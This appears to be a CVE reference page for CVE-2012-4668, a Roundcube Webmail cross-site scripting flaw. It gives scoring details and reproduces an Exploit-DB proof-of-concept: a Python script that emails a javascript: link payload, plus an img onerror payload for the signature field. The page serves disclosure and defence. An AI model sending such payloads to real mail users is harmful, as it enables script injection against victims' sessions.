CVE-2012-4668

CVE Descriptions

Cross-site scripting (XSS) vulnerability in Roundcube Webmail 0.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the signature in an email.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4.3		AV:N/AC:M/Au:N/C:N/I:P/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 20549

Publication date : 2012-08-15 22h00 +00:00
Author : Shai rod
EDB Verified : Yes

#!/usr/bin/python ''' # Exploit Title: Roundcube Webmail Stored XSS. # Date: 14/08/2012 # Exploit Author: Shai rod (@NightRang3r) # Vendor Homepage: http://roundcube.net # Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download # Version: 0.8.0 #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar # Timeline: #14 Aug 2012: Discovered Vulnerability. #14 Aug 2012: Opened Ticket #1488613 - http://trac.roundcube.net/ticket/1488613 #15 Aug 2012: Fix added to repo. https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32 https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee About the Application: ====================== Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube includes other sophisticated open-source libraries such as PEAR, an IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte. Vulnerability Description ========================= 1. Stored XSS in e-mail body. XSS Payload: <a href=javascript:alert("XSS")>POC MAIL</a> Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered. 2. Self XSS in e-mail body (Signature). XSS Payload: "><img src='1.jpg'onerror=javascript:alert("XSS")> In order to trigger this XSS you should insert the payload into your signature. Settings -> Identities -> Your Identitiy -> Signature Now create a new mail, XSS Should be triggered. ''' import smtplib print "###############################################" print "# Roundcube 0.8.0 Stored XSS POC #" print "# Coded by: Shai rod #" print "# @NightRang3r #" print "# http://exploit.co.il #" print "# For Educational Purposes Only! #" print "###############################################\r\n" # SETTINGS sender = "attacker@localhost" smtp_login = sender smtp_password = "qwe123" recipient = "victim@localhost" smtp_server = "192.168.1.10" smtp_port = 25 subject = "Roundcube Webmail XSS POC" # SEND E-MAIL print "[*] Sending E-mail to " + recipient + "..." msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n" % (sender, ", ".join(recipient), subject) ) msg += "Content-type: text/html\n\n" msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n""" server = smtplib.SMTP(smtp_server, smtp_port) server.ehlo() server.starttls() server.login(smtp_login, smtp_password) server.sendmail(sender, recipient, msg) server.quit() print "[+] E-mail sent!"